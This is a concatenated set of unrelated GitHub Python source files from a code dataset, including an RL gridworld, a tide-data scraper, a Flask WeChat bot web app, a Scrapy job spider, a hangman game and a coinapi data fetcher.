5 secondes\"\n \n response = html + stateis\n \n cl.send('HTTP/1.0 200 OK\\r\\nContent-type: text/html\\r\\n\\r\\n')\n cl.send(response)\n cl.close()\n \n except OSError as e:\n cl.close()\n print('connection closed')","repo_name":"mehdidjitli/Projet-personnel","sub_path":"Automatic-watering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39400630929","text":"import numpy as np\nimport matplotlib.pylab as plt\nfrom renderer import *\nfrom datetime import datetime\nimport os\n\n\nclass Agent:\n def __init__(self, i, world):\n self.i = i\n self.world = world\n self.x = np.random.uniform(size=2)\n self.v = np.zeros_like(self.x)\n self.history = []\n self.store_history()\n\n def update(self, action):\n self.v += action\n\n norm = np.linalg.norm(self.v)\n if norm > .1:\n self.v /= norm\n self.v *= .1\n self.x += self.v\n\n if np.max(np.abs(self.x)) > 2.:\n self.v = np.zeros_like(self.v)\n self.x = np.clip(self.x, -1.95, 
1.95)\n\n self.store_history()\n\n def get_state(self):\n return np.concatenate((self.x, self.v)).flatten()\n\n def store_history(self):\n self.history.append(np.copy(self.x))\n\n\nclass World:\n def __init__(self, n_agents):\n self.n_agents = n_agents\n self.reset()\n self.state_dim = 8\n self.action_dim = 2\n\n def reset(self):\n self.agents = [Agent(i, self) for i in range(self.n_agents)]\n return self.get_state()\n\n def get_state(self):\n return [agent.get_state() for agent in self.agents]\n\n def step(self, action):\n self.agents[0].update(np.random.uniform(-.1, .1, size=2))\n self.agents[1].update(action * .1)\n d = self.agents[0].x - self.agents[1].x\n d = np.linalg.norm(d)\n r = -d\n event = d < .1\n s = [agent.get_state() for agent in self.agents]\n return s, r, False, event\n\n\nclass DiscreteWorld(World):\n def __init__(self, n_agents):\n super().__init__(n_agents)\n self.action_dim = 5\n\n def transform_action(self, action):\n if action == 0:\n action = [0., 0.]\n elif action == 1:\n action = [.1, 0.]\n elif action == 2:\n action = [.0, .1]\n elif action == 3:\n action = [-.1, 0.]\n elif action == 4:\n action = [0., -.1]\n return action\n\n def step(self, action):\n action = self.transform_action(action)\n return super().step(action)\n\n\nclass TargetWorld(DiscreteWorld):\n def __init__(self, n_agents):\n super().__init__(n_agents)\n\n def step(self, action):\n action = self.transform_action(action)\n self.agents[0].update(np.random.uniform(-.1, .1, size=2))\n self.agents[1].update(action)\n d = self.agents[0].x - self.agents[1].x\n d = np.linalg.norm(d)\n r = -1\n event = d < .1\n s = [agent.get_state() for agent in self.agents]\n done = np.linalg.norm(self.agents[1].x) < .1\n return s, r, done, event\n\n\nclass MoveAgent:\n def __init__(self):\n self.x = np.random.randint(0, 5, size=2)\n self.history = []\n self.store_history()\n\n def update(self, action):\n self.x += action\n self.x = np.clip(self.x, 0, 5)\n self.store_history()\n\n def store_history(self):\n self.history.append(np.copy(self.x))\n\n\nclass MoveWorld:\n def __init__(self):\n super().__init__()\n self.reset()\n self.state_dim = 6\n self.actions = [[0, 0], [1, 0], [0, 1], [-1, 0], [0, -1]]\n self.action_dim = len(self.actions)\n\n def reset(self):\n self.agents = [MoveAgent() for _ in range(2)]\n self.target = np.zeros(2)\n return self.get_state()\n\n def step(self, action):\n self.agents[0].update(\n self.actions[np.random.randint(len(self.actions))])\n self.agents[1].update(self.transform_action(action))\n event = all(self.agents[0].x == self.agents[1].x)\n done = all(self.agents[1].x == self.target)\n return self.get_state(), -1, done, event\n\n def get_state(self):\n return np.concatenate((np.array([a.x for a in self.agents]).flatten(), self.target)).flatten()\n\n def transform_action(self, action):\n return self.actions[action]\n\n\nclass MoveAgentContinuous:\n def __init__(self, init_low, init_high):\n self.x = np.random.uniform(init_low, init_high, size=2)\n self.v = np.zeros_like(self.x)\n self.history = []\n self.store_history()\n\n def update(self, action):\n self.v += action\n norm = np.linalg.norm(self.v)\n if norm > 1:\n self.v /= norm\n self.x += self.v\n if max(self.x) > 1 or min(self.x) < -1:\n self.v = np.zeros_like(self.v)\n self.x = np.clip(self.x, -1, 1)\n self.store_history()\n\n def store_history(self):\n self.history.append(np.copy(self.x))\n\n\nclass MoveWorldContinuous:\n def __init__(self):\n super().__init__()\n self.reset()\n self.state_dim = 6\n self.action_dim = 2\n\n def 
reset(self):\n self.agents = [MoveAgentContinuous(0 - i, .5 - i) for i in range(2)]\n self.target = np.random.uniform(.5, 1, size=2)\n return self.get_state()\n\n def step(self, action):\n self.agents[0].update(np.random.uniform(-.05, .05, size=2))\n self.agents[1].update(action * .05)\n d = self.agents[0].x - self.agents[1].x\n d = np.linalg.norm(d)\n event = d < .1\n d_target = np.linalg.norm(self.target - self.agents[1].x)\n r = - 1\n done = d_target < .1\n return self.get_state(), r, done, event\n\n def get_state(self):\n return np.concatenate((np.array([a.x for a in self.agents]).flatten(), self.target)).flatten()\n\n def transform_action(self, action):\n return self.actions[action]\n","repo_name":"lenzbelzner/psyco","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3538939122","text":"from storyscript import loads\n\n\nclass SLSJSONCompiler:\n \"\"\"\n Allows compiling Storyscript via a LSP request.\n \"\"\"\n\n def compile(self, doc, features):\n output = loads(doc.text(), features)\n return {\n \"errors\": [self.error_to_json(error) for error in output.errors()],\n \"deprecations\": [\n self.error_to_json(dep) for dep in output.deprecations()\n ],\n \"success\": output.success(),\n \"result\": output.result().output() if output.success() else None,\n }\n\n @staticmethod\n def error_to_json(error):\n \"\"\"\n Convert an individual error message to JSON.\n \"\"\"\n error.process()\n return {\n \"code\": error.error_code(),\n \"hint\": error.hint(),\n \"position\": {\n \"line\": error.int_line(),\n \"column\": error.start_column(),\n \"end_column\": error.end_column(),\n },\n }\n","repo_name":"wilzbach/storyscript-sls","sub_path":"sls/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9429094931","text":"from weboob.browser.pages import HTMLPage\nfrom weboob.browser.elements import ListElement, ItemElement, method\nfrom weboob.browser.filters.standard import CleanText, DateTime, CleanDecimal, Regexp\nfrom weboob.browser.filters.html import Link, XPath\nfrom weboob.capabilities.gauge import Gauge, GaugeMeasure, GaugeSensor\nfrom datetime import timedelta\nimport re\n\n\nclass IndexPage(HTMLPage):\n @method\n class get_harbor_list(ListElement):\n item_xpath = \"//a[@class='Port PP'] | //a[@class='Port PS']\"\n\n class item(ItemElement):\n klass = Gauge\n\n obj_id = CleanText(Link('.'), replace=[('/', '')])\n obj_name = CleanText('.')\n obj_city = CleanText('.')\n obj_object = u'Port'\n\n def validate(self, obj):\n if self.env['pattern']:\n return self.env['pattern'].lower() in obj.name.lower()\n return True\n\n @method\n class get_harbor_infos(ItemElement):\n klass = Gauge\n\n def _create_coef_sensor(self, gauge_id, AM=True):\n name = CleanText('//tr[@class=\"MJE\"]/th[4]')(self)\n _name = 'matin' if AM else 'aprem'\n value = self._get_coef_value(AM=AM)\n\n if value:\n coef = GaugeSensor(u'%s-%s-%s' % (gauge_id, name, _name))\n coef.name = '%s %s' % (name, _name)\n coef.lastvalue = value\n coef.gaugeid = gauge_id\n\n coef.history = []\n for jour in range(0, 7):\n measure = self._get_coef_value(AM=AM, jour=jour)\n if measure:\n coef.history.append(measure)\n\n return coef\n\n def _get_coef_value(self, AM=True, jour=0):\n if AM:\n time = DateTime(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]/b[1]' % jour), 
strict=False)(self)\n value = CleanText('//tr[@id=\"MareeJours_%s\"]/td[3]/b[1]' % jour)(self)\n else:\n time, value = None, None\n if len(XPath('//tr[@id=\"MareeJours_%s\"]/td[1]/b' % jour)(self)) > 1:\n time = DateTime(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]/b[2]' % jour), strict=False)(self)\n value = CleanText('//tr[@id=\"MareeJours_%s\"]/td[3]/b[2]' % jour)(self)\n\n if time and value:\n measure = GaugeMeasure()\n measure.level = float(value)\n measure.date = time + timedelta(days=jour)\n return measure\n\n def _create_high_tide(self, gauge_id, AM=True):\n name = CleanText('//tr[@class=\"MJE\"]/th[3]')(self)\n _name = 'matin' if AM else 'aprem'\n value = self._get_high_tide_value(AM=AM)\n\n if value:\n tide = GaugeSensor(u'%s-%s-PM-%s' % (gauge_id, name, _name))\n tide.name = u'Pleine Mer %s' % (_name)\n tide.unit = u'm'\n tide.lastvalue = value\n tide.gaugeid = gauge_id\n\n tide.history = []\n for jour in range(0, 7):\n measure = self._get_high_tide_value(AM=AM, jour=jour)\n if measure:\n tide.history.append(measure)\n\n return tide\n\n def _get_high_tide_value(self, AM=True, jour=0):\n if AM:\n time = DateTime(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]/b[1]' % jour), strict=False)(self)\n value = CleanDecimal('//tr[@id=\"MareeJours_0\"]/td[2]/b[1]', replace_dots=True)(self)\n else:\n time, value = None, None\n if len(XPath('//tr[@id=\"MareeJours_%s\"]/td[1]/b' % jour)(self)) > 1:\n time = DateTime(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]/b[2]' % jour),\n strict=False, default=None)(self)\n value = CleanDecimal('//tr[@id=\"MareeJours_0\"]/td[2]/b[2]', replace_dots=True,\n default=None)(self)\n\n if time and value:\n measure = GaugeMeasure()\n measure.level = float(value)\n measure.date = time + timedelta(days=jour)\n return measure\n\n def _create_low_tide(self, gauge_id, AM=True):\n name = CleanText('//tr[@class=\"MJE\"]/th[3]')(self)\n _name = 'matin' if AM else 'aprem'\n value = self._get_low_tide_value(AM=AM)\n\n if value:\n tide = GaugeSensor(u'%s-%s-BM-%s' % (gauge_id, name, _name))\n tide.name = u'Basse Mer %s' % (_name)\n tide.unit = u'm'\n tide.lastvalue = value\n tide.gaugeid = gauge_id\n\n tide.history = []\n for jour in range(0, 7):\n measure = self._get_low_tide_value(AM=AM, jour=jour)\n if measure:\n tide.history.append(measure)\n\n return tide\n\n def _is_low_tide_first(self, jour):\n return XPath('//tr[@id=\"MareeJours_%s\"]/td[1]' % jour)(self)[0].getchildren()[0].tag != 'b'\n\n def _get_low_tide_value(self, AM=True, jour=0):\n slow_tide_pos = 1 if self._is_low_tide_first(jour) else 2\n m = re.findall('(\\d{2}h\\d{2})', CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]' % jour)(self))\n\n re_time = '(\\d{2}h\\d{2}).*(\\d{2}h\\d{2}).*(\\d{2}h\\d{2})'\n re_value = '(.*)m(.*)m(.*)m'\n if len(m) > 3:\n re_time = '(\\d{2}h\\d{2}).*(\\d{2}h\\d{2}).*(\\d{2}h\\d{2}).*(\\d{2}h\\d{2})'\n re_value = '(.*)m(.*)m(.*)m(.*)m'\n\n if AM:\n time = DateTime(Regexp(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]' % jour),\n re_time,\n '\\\\%s' % slow_tide_pos), strict=False)(self)\n\n value = CleanDecimal(Regexp(CleanText('//tr[@id=\"MareeJours_%s\"]/td[2]' % jour),\n re_value,\n '\\\\%s' % slow_tide_pos),\n replace_dots=True, default=None)(self)\n\n else:\n slow_tide_pos += 2\n time, value = None, None\n if len(m) > slow_tide_pos - 1:\n time = DateTime(Regexp(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]' % jour),\n re_time,\n '\\\\%s' % slow_tide_pos), strict=False)(self)\n\n value = CleanDecimal(Regexp(CleanText('//tr[@id=\"MareeJours_%s\"]/td[2]' % jour),\n re_value,\n '\\\\%s' % 
slow_tide_pos),\n replace_dots=True, default=None)(self)\n\n if time and value:\n measure = GaugeMeasure()\n measure.level = float(value)\n measure.date = time + timedelta(days=jour)\n return measure\n\n def obj_sensors(self):\n sensors = []\n high_tide_PM = self._create_high_tide(self.obj.id)\n if high_tide_PM:\n sensors.append(high_tide_PM)\n high_tide_AM = self._create_high_tide(self.obj.id, AM=False)\n if high_tide_AM:\n sensors.append(high_tide_AM)\n low_tide_AM = self._create_low_tide(self.obj.id)\n if low_tide_AM:\n sensors.append(low_tide_AM)\n low_tide_PM = self._create_low_tide(self.obj.id, AM=False)\n if low_tide_PM:\n sensors.append(low_tide_PM)\n coef_AM = self._create_coef_sensor(self.obj.id)\n if coef_AM:\n sensors.append(coef_AM)\n coef_PM = self._create_coef_sensor(self.obj.id, AM=False)\n if coef_PM:\n sensors.append(coef_PM)\n return sensors\n","repo_name":"laurentb/weboob","sub_path":"modules/mareeinfo/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":7988,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"75"} +{"seq_id":"38666112983","text":"#Fed Model\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport openpyxl\nimport numpy as np\nfrom datetime import datetime\npath = \"/Users/macbook/desktop/GF-FedModel/data.xlsx\"\n\ndate_column = []\nnominal_yield = []\nearnings_yield = []\nmmfData = []\nmmf_yield=[]\nname = \"Fed Model by Day\"\ndef readData(path):\n wb = openpyxl.load_workbook(path)\n sheet = wb.active\n for i in range(11,sheet.max_row +1):\n cell1 = sheet.cell(row = i, column = 2)\n cell2 = sheet.cell(row = i, column = 3)\n datecell = sheet.cell(row=i,column = 1)\n mmf = sheet.cell(row=i,column = 9)\n if i<2441:\n mmfData.insert(0,float(mmf.value))\n if (int(cell1.value)==0 or int(cell2.value)==0):\n continue\n else:\n nominal_yield.append(float(cell1.value))\n earnings_yield.append(100.0/(float(cell2.value)))\n date_column.append(datecell.value)\n\ndef readWeek(path):\n wb = openpyxl.load_workbook(path)\n sheet = wb.active\n for i in range(11,sheet.max_row +1,7):\n cell1 = sheet.cell(row = i, column = 2)\n cell2 = sheet.cell(row = i, column = 3)\n count = 0\n while (int(cell1.value)==0 or int(cell2.value)==0):\n count+=1\n cell1 = sheet.cell(row = i+count,column = 2)\n cell2 = sheet.cell(row = i+count,column = 3)\n \n nominal_yield.append(float(cell1.value))\n earnings_yield.append(100.0/(float(cell2.value)))\n name = \"Fed Model by Week\"\n\ndef plotData(x_data, yield1, yield2, name):\n plt.figure()\n plt.plot(x_data, yield1, label='Yu E Bao', color='blue')\n plt.plot(x_data, yield2, label='CSI 800', color='red')\n plt.xlabel('Year')\n plt.ylabel('Rate %')\n plt.title(name)\n plt.xticks(rotation=45)\n plt.legend()\n plt.show()\n\ndef plotResiduals(date_column,data,data1):\n plt.figure(figsize=(10, 6))\n a = mdates.date2num(date_column)\n # 使用numpy进行线性回归拟合\n coefficients = np.polyfit(a, data, 1)\n slope = coefficients[0]\n intercept = coefficients[1]\n trend_line = slope * mdates.date2num(date_column) + intercept\n\n # 计算残差(实际数据减去趋势线)\n residuals = data - trend_line\n\n coef = np.polyfit(a,data1,1)\n slope1 = coef[0]\n intercept1 = coef[1]\n trend_line1 = slope1 * mdates.date2num(date_column) + intercept1\n\n residuals1 = data1 - trend_line1\n # 绘制残差图\n plt.plot(date_column, residuals, label='Bond Yield', color='blue')\n plt.plot(date_column, residuals1, label='CSI 500 Earnings Yield', color='red')\n plt.axhline(y=0, color='green', linestyle='--', label='Zero line')\n 
plt.xlabel('Years')\n plt.ylabel('Residuals')\n plt.title('Residuals of Yield Data')\n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y'))\n plt.gca().xaxis.set_major_locator(mdates.YearLocator())\n plt.legend()\n plt.xticks(rotation=45)\n plt.tight_layout()\n plt.show()\n\nreadData(path)\n\n#plotData(date_column, mmfData, earnings_yield, name)\nplotResiduals(date_column,nominal_yield,earnings_yield)\n\n\n\n\n\n","repo_name":"aochannn/GF-FedModel","sub_path":"fed_model.py","file_name":"fed_model.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22577801483","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nURLを入力して、スクレイピングして名詞のデータ集める\n\"\"\"\n\nimport scrape_morph as morph\nimport xl_control as xl\n\n\n\nxlfile = 'excel/category13.xlsx'\nurls = xl.getURLs(xlfile)\ni = 1\nfor url in urls:\n words_list = morph.getNouns(url)\n xl.addData(words_list,xlfile)\n print(str(i)+\" : Add New Data:\")\n print(url)\n i+=1\n\n# xl.test()\nprint(\"Complete\")\n","repo_name":"KuwaNori/graduation_thesis","sub_path":"classify/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28040451577","text":"import os\n\nimport scrapy\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nclass BrightermondaySpiderSpider(scrapy.Spider):\n name = \"brightermonday_spider\"\n allowed_domains = os.environ.get(\"BRIGHTERMON_DOMAIN\").split(\",\")\n start_urls = os.environ.get(\"BRIGHTERMON_URLS\", \"\").split(\",\")\n\n custom_settings = {\n \"FEEDS\": {\n \"brightermon_listings.json\": {\n \"format\": \"json\",\n \"encoding\": \"utf8\",\n \"overwrite\": True,\n }\n }\n }\n\n def parse(self, response):\n for listing in response.css('div[data-cy=\"listing-cards-components\"]'):\n title = listing.css(\"a::attr(title)\").get()\n company = listing.css(\"p.text-sm.text-link-500::text\").get()\n\n if company is not None:\n company = company.strip()\n else:\n company = \"Brighter Monday\"\n\n region = listing.css(\"div span::text\").get().strip()\n urls = [listing.css(\"a::attr(href)\").get()]\n\n yield {\n \"title\": title,\n \"company\": company,\n \"region\": region,\n \"urls\": urls,\n }\n","repo_name":"TrippleA-Ashaba/beeblebrox","sub_path":"jobcrawler/jobcrawler/spiders/brightermonday_spider.py","file_name":"brightermonday_spider.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37038127743","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#!/usr/bin/env python3\n\nimport sys\n\n \nfrom PyQt5.uic import loadUiType\n\nui_Hangman,HangmanBaseClass = loadUiType('hangman.ui')\n\nfrom PyQt5.QtCore import Qt\n\nclass Hangman(HangmanBaseClass, ui_Hangman):\n\n def __init__(self):\n super(Hangman, self).__init__()\n\n self.setupUi(self)\n\n\n self.word_to_guess = \"cryptographic\"\n self.guessed = \"_\"*len(self.word_to_guess)\n\n self.wordLabel.setText(self.guessed)\n\n self.setFocusPolicy(Qt.StrongFocus)\n\n def keyPressEvent(self, event):\n print(\"keyPressEvent: {}\".format(event.text()))\n\n text = event.text().lower()\n\n if text:\n if text in self.word_to_guess:\n for i, c in enumerate(self.word_to_guess):\n if c == text:\n self.guessed = self.guessed[:i]+text+self.guessed[i+1:]\n\n self.wordLabel.setText(self.guessed)\n \n super(Hangman, 
self).keyPressEvent(event)\n\n\n \n\nif __name__ == '__main__':\n from PyQt5.QtWidgets import QApplication\n\n import sys\n app = QApplication(sys.argv)\n\n hangman = Hangman()\n hangman.show()\n\n app.exec()\n","repo_name":"TheBluPika919/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31571972501","text":"from flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n\na_lst = [\n\n]\n\n\n@app.route('/sort')\ndef sort():\n b = {\n 'asc': request.json['asc'],\n 'array': request.json['array']\n }\n c = b['array']\n sort(c, key=lambda x: x['name'])\n print(c)\n return jsonify({'b': {'succes': True, 'array': c}})\n\n\napp.run(debug=True)\n","repo_name":"catarium/Tournament","sub_path":"projects/Catarium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21389289392","text":"from flask import render_template, flash, redirect,g,url_for,session,request,jsonify\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom app import app,lm,db\nfrom .models import User,Wxbot\nfrom .forms import LoginForm,RegistrationForm\nfrom .wechat import wx_is_login_state,wx_logout,wx_login_bat,allowed_file,GetWechatNum,DeleteCache\nimport os\nimport hashlib\nimport time\n\nIpfrequency={} #ip频率检测\n\n@app.before_request\ndef before_request():\n g.user = current_user\n try:\n if 'MicroMessenger' in request.headers['User-Agent']:\n return render_template('error.html')\n except:\n return render_template('error.html')\n\n\n\n@app.route('/')\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n try:\n isfile=os.path.isfile(g.user.imgpath)\n except:\n isfile=False\n if not g.user.is_authenticated:\n return render_template('wechat.html',\n isfile=isfile,\n function_list=Wxbot().GetSetting())\n if g.user.isadmin:\n return render_template('wechat.html',\n isfile=isfile,\n function_list=Wxbot().GetSetting())\n else:\n return render_template('wechat.html',\n isfile=isfile,\n function_list=Wxbot().GetSetting())\n\n@lm.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\n#登录\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n # g 对象 存储生命周期内已经登录的用户,不用再次登录 直接重定向至 主页\n if g.user is not None and g.user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user is not None and user.verify_password(form.password.data):\n session['remember_me'] = form.remember_me.data\n login_user(user, form.remember_me.data)\n return redirect(request.args.get('next') or url_for('index'))\n flash('Invalid username or password.')\n return render_template('login.html',\n title='Sign In',\n form=form)\n#注册\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(email=form.email.data,\n password=form.password.data,\n pid=999999,\n isadmin=False)\n user.save()\n flash('注册成功,请使用注册帐号登录吧!')\n return redirect(url_for('login'))\n return render_template('register.html', form=form)\n\n#退出登录\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n###微信视图\n@app.route('/wechat', methods=['GET', 'POST'])\ndef wechat():\n return 
redirect(url_for('index'))\n\n\n@app.route('/wechat/login/', methods=['GET', 'POST'])\ndef wechat_login():\n if GetWechatNum()>30:\n flash('服务器达到最大负载,请稍后重试')\n return redirect(url_for('index'))\n #频率检测\n try:\n ip=request.remote_addr\n except:\n flash('非法调用')\n return redirect(url_for('index'))\n try:\n if int(time.time())-Ipfrequency[ip][1]>60:\n Ipfrequency[ip] = [1, int(time.time())]\n else:\n Ipfrequency[ip][0]=Ipfrequency[ip][0]+1\n if Ipfrequency[ip][0]>=3:\n flash('调用次数过多,请1分钟后重试')\n return redirect(url_for('index'))\n except:\n Ipfrequency[ip]=[1,int(time.time())]\n ####\n try:\n if 'wechat' in request.headers['Referer']:\n flash('请勿重复获取')\n return redirect(url_for('index'))\n except:\n flash('请勿重复获取')\n return redirect(url_for('index'))\n setting=Wxbot().GetSetting()\n temp = request.args.get('timestamp')\n if not setting['Onbot']:\n flash('管理员禁止登录')\n return redirect(url_for('index'))\n\n if g.user.is_authenticated:\n if g.user.sendtext==None and g.user.imgpath==None and setting['Oncustom']:\n flash('请先设置发送内容')\n return redirect(url_for('index'))\n ret = wx_is_login_state()\n if not ret:\n wx_logout()\n WX_PID = wx_login_bat(temp)\n if WX_PID:\n flash('请在60秒内扫码登录,过期失效')\n return render_template('wxchat/wxlogin.html',\n img_path='%s.jpg' % temp,\n is_wxchat=ret,\n active_page='wechat_login',\n function_list=setting)\n flash('获取二维码失败,请重新获取')\n wx_logout()\n return render_template('wxchat/wxlogin.html',\n img_path=False,\n is_wxchat=ret,\n active_page='wechat_login',\n function_list=setting)\n flash('请勿重复登录')\n return redirect(url_for('index'))\n #未登录用户获取二维码\n WX_PID = wx_login_bat(temp)\n if WX_PID:\n flash('请在120秒内扫码登录,过期失效')\n return render_template('wxchat/wxlogin.html',\n img_path='%s.jpg' % temp,\n is_wxchat=False,\n active_page='wechat_login',\n function_list=setting)\n flash('获取二维码失败,请重新获取')\n return redirect(url_for('index'))\n\n\n\n\n@app.route('/wechat/setting', methods = ['POST','GET'])\ndef wechat_setting():\n if not g.user.is_authenticated:\n flash('注册登录后使用,自定义消息')\n return redirect(url_for('index'))\n if request.method == 'POST':\n user = g.user\n file = request.files['file']\n if file and allowed_file(file.filename):\n ext = file.filename.split('.')[1]\n name = '%s' % g.user.email + str(time.time())\n name=hashlib.md5(name.encode()).hexdigest()[:15]\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], '%s.%s'%(name,ext)))\n user.imgpath=os.path.join(app.config['UPLOAD_FOLDER'], '%s.%s'%(name,ext))\n user.cover =url_for('.static',filename='cache/%s'%('%s.%s'%(name,ext)))\n flash('上传成功 使用图片内容')\n user.istextimg=False #表示使用图片\n user.save()\n return redirect(url_for('index'))\n\n\n@app.route('/wechat/setting1', methods = ['POST','GET'])\ndef wechat_setting1():\n if request.method == 'POST':\n if not g.user.is_authenticated:\n return jsonify({\n 'text': '注册登录后使用,自定义消息'\n })\n text1 = request.form['text1']\n if len(text1)>50:\n return jsonify({\n 'text':'内容太长,保存失败'\n })\n user=g.user\n user.sendtext = text1\n user.istextimg=True\n user.save()\n flash('上传成功 使用文字内容')\n return jsonify({\n 'text': '上传成功'\n })\n flash('上传失败')\n return redirect(url_for('index'))\n\n@app.route('/wechat/setting3', methods = ['POST','GET'])\n@login_required\ndef wechat_setting3():\n if not g.user.is_authenticated:\n flash('登录成功后,可以使用自定义消息')\n return redirect(url_for('index'))\n if not g.user.isadmin:\n flash('非法调用')\n return redirect(url_for('index'))\n if request.method == 'POST':\n try:\n SendInterval=int(request.form['SendInterval'])\n SendRestnumber = int(request.form['SendRestnumber'])\n 
SendRest = int(request.form['SendRest'])\n SendOften=int(request.form['SendOften'])\n except:\n return jsonify({\n 'text':'消息间隔设置错误'\n })\n if request.form['Onbot']=='true':\n Onbot=True\n else:\n Onbot=False\n if request.form['Oncustom']=='true':\n Oncustom=True\n else:\n Oncustom = False\n if request.form['Ontail']=='true':\n Ontail=True\n else:\n Ontail = False\n if request.form['OnSendTwoMsg']=='true':\n OnSendTwoMsg=True\n else:\n OnSendTwoMsg = False\n TailText1=request.form['settext1']\n TailText2 = request.form['settext2']\n TailText3 = request.form['settext3']\n TailText4 = request.form['settext4']\n TailText5 = request.form['settext5']\n setting=Wxbot().get()\n setting.Onbot=Onbot\n setting.Oncustom=Oncustom\n setting.Ontail=Ontail\n setting.TailText1 = TailText1\n setting.TailText2 = TailText2\n setting.TailText3 = TailText3\n setting.TailText4 = TailText4\n setting.TailText5 = TailText5\n setting.SendInterval=SendInterval\n setting.SendRestnumber = SendRestnumber\n setting.SendRest = SendRest\n setting.OnSendTwoMsg=OnSendTwoMsg\n setting.SendOften = SendOften\n setting.save()\n flash('保存成功')\n return redirect(url_for('index'))\n\n@app.route('/wechat/wxlogout/', methods=['GET', 'POST'])\ndef wechat_wxlogout():\n if not g.user.is_authenticated:\n flash('未注册登录用户,请在手机端微信 上方点击退出登录')\n return redirect(url_for('index'))\n ret = wx_is_login_state()\n if ret:\n a = wx_logout()\n flash(a)\n return redirect(url_for('wechat'))\n flash('未登录微信')\n return redirect(url_for('wechat'))\n\n\n@app.errorhandler(404)\ndef internal_error(error):\n return redirect(url_for('index'))\n\n\n@app.errorhandler(500)\ndef internal_error(error):\n db.session.rollback()\n return redirect(url_for('index'))","repo_name":"aduya/WEB-wechat","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27765923700","text":"def get_contact():\n print('Нажмите ~ в поле \"Имя\" после добавления абонента')\n contact = []\n while(True):\n name = input('Имя: ')\n if name == '~':\n break\n contact.append(name)\n surname = input('Фамилия: ')\n contact.append(surname)\n phone = input('Номер телефона: ')\n contact.append(phone)\n info = input('Описание: ')\n contact.append(info)\n print(f'Добавлен абонент: {contact}')\n return contact\n","repo_name":"Kustol/GR3122_Python","sub_path":"PhoneBook/module_add.py","file_name":"module_add.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18187124301","text":"import datetime\nimport json\nimport os\n\nimport requests\n\n\nBASE_URL = \"https://rest.coinapi.io\"\nAPI_KEY = os.environ.get(\"COINAPI_API_KEY\")\n\n\nclass NoAPIKeyError(Exception):\n pass\n\nclass InvalidAPIKeyError(Exception):\n pass\n\n\ndef main():\n \"\"\"This app requests coinapi and gets the historical data of the\n exchange rates of bitcoin in USD.\n\n The coinapi returns only 100 results, and it offers no pagination.\n Therefore, this code implements an algorithm based on datetime calculation\n to retrieve multiple slices of 100 days.\n \"\"\"\n if not API_KEY:\n raise NoAPIKeyError(\n \"Make sure that you use a valid coinapi key as env var COINAPI_API_KEY\"\n )\n\n end = datetime.date.today()\n start = end - datetime.timedelta(days=100)\n\n count = 1\n\n while start > datetime.date(year=2010, month=1, day=1):\n print(f\"{count}: Getting data from {start} to {end}\")\n data 
